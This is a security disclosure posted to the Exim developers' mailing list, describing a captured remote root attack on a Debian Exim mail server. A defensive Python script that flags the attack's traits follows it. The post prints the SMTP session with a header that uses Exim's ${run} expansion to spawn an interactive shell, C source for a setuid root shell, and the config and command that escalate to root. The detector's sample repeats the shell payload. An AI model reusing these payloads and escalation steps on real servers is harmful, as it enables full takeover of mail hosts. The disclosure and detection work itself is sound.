Hi,

While investigating a security break-in in the network of my company, I captured (by tcpdump) the sequence of a successful remote root attack through Exim. It was Exim from Debian Lenny (exim4-daemon-light 4.69-9). I didn't find the email of the current maintainer of Exim, so I decided to write to this mailing list. I don't want to publish all details of the attack before the developers can investigate and fix the vulnerability. So I ask the Exim maintainers to contact me and I will send them the complete captured sequence of the attack. Here I can put a brief sequence of the attack:
    EHLO mail.domain.com
    MAIL FROM: <[email protected]>
    RCPT TO: <[email protected]>
    DATA
    MAILbombhdr0001: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0
    ....
    MAILbombhdr0054: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0m
    HeaderX: ${run{/bin/sh -c 'exec /bin/sh -i <&3 >&0 2>&0'}}${run{/bin/sh -c 'exec /bin/sh -i <&4 >&0 2>&0'}}........
    MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
    MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
    .......... about 700000 of the same strings ..........
    MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
    MAILbombMAILb
    .
    MAIL FROM: <[email protected]>
    RCPT TO: <[email protected]>

After that the attacker gets a shell with the id of user Debian-exim and cwd in /var/spool/exim4. Then it puts there a file setuid with a trivial execution of a root shell:

    int main(int argc, char *argv[])
    {
        setuid(0);
        setgid(0);
        setgroups(0, NULL);
        execl("/bin/sh", "sh", NULL);
    }

and creates another file e.conf with the following content:

    spool_directory = ${run{/bin/chown root:root /var/spool/exim4/setuid}}${run{/bin/chmod 4755 /var/spool/exim4/setuid}}

Then he runs:

    exim -Ce.conf -q

and gets the suid bit on /var/spool/exim4/setuid. Everything else is trivial.

I haven't reproduced the remote part of the attack, but the escalation from Debian-exim to root also works with exim4-daemon-light 4.72-2 from Debian Squeeze.

With best regards,
Sergey Kononenko.

--
## List details at http://lists.exim.org/mailman/listinfo/exim-dev Exim details at http://www.exim.org/ ##
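A defender-side check for the traits of the session captured above, added here as an example and not part of the original post or of Exim itself: it scans the lines a client sent after DATA for a header carrying the Exim ${run{...}} expansion operator and for an abnormal volume of oversize headers and body. The thresholds and the simplified header parsing are assumptions for this example.

```python
import re

# Thresholds are assumptions for this example, not limits taken from Exim;
# tune them to the traffic your own MTA normally sees.
MAX_HEADER_LEN = 1024        # bytes in one header line
MAX_HEADER_COUNT = 50        # header lines before the body
MAX_BODY_BYTES = 1_000_000   # body size worth a second look
EXPANSION_RE = re.compile(r"\$\{run\{")   # Exim ${run{...}} string expansion


def analyze_data_section(lines):
    """Scan what a client sent after DATA (up to the lone '.') and report the
    traits of the captured attack. Header parsing is simplified: the header
    section ends at the first blank line or the first line that is neither
    'Name: value' nor a whitespace-led continuation line."""
    report = {"header_count": 0, "oversize_headers": 0,
              "expansion_headers": [], "body_bytes": 0, "alerts": []}
    in_headers = True
    for raw in lines:
        line = raw.rstrip("\r\n")
        if line == ".":                          # end of DATA
            break
        if in_headers:
            is_cont = line[:1] in (" ", "\t")
            if line == "" or (":" not in line and not is_cont):
                in_headers = False               # body starts here
                report["body_bytes"] += len(line)
                continue
            report["header_count"] += 1
            name = "(continuation)" if is_cont else line.partition(":")[0].strip()
            if len(line) > MAX_HEADER_LEN:
                report["oversize_headers"] += 1
            if EXPANSION_RE.search(line):
                report["expansion_headers"].append(name)
        else:
            report["body_bytes"] += len(line)
    if report["expansion_headers"]:
        report["alerts"].append("Exim expansion operator in header(s): "
                                + ", ".join(report["expansion_headers"]))
    if report["oversize_headers"] or report["header_count"] > MAX_HEADER_COUNT:
        report["alerts"].append(f"{report['header_count']} headers, "
                                f"{report['oversize_headers']} over {MAX_HEADER_LEN} bytes")
    if report["body_bytes"] > MAX_BODY_BYTES:
        report["alerts"].append(f"body of {report['body_bytes']} bytes")
    return report


# Constructed sample mirroring the shape of the captured session, much shorter.
SAMPLE_DATA = ([f"MAILbombhdr{i:04d}: " + "M4iLB0mb" * 200 for i in range(1, 55)]
               + ["HeaderX: ${run{/bin/sh -c 'exec /bin/sh -i <&3 >&0 2>&0'}}"]
               + ["MAILbomb" * 10] * 50 + ["."])

if __name__ == "__main__":
    for alert in analyze_data_section(SAMPLE_DATA)["alerts"]:
        print("ALERT:", alert)
```

Feed it the DATA portion of a reassembled tcpdump session, one line per element, to triage further captures.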
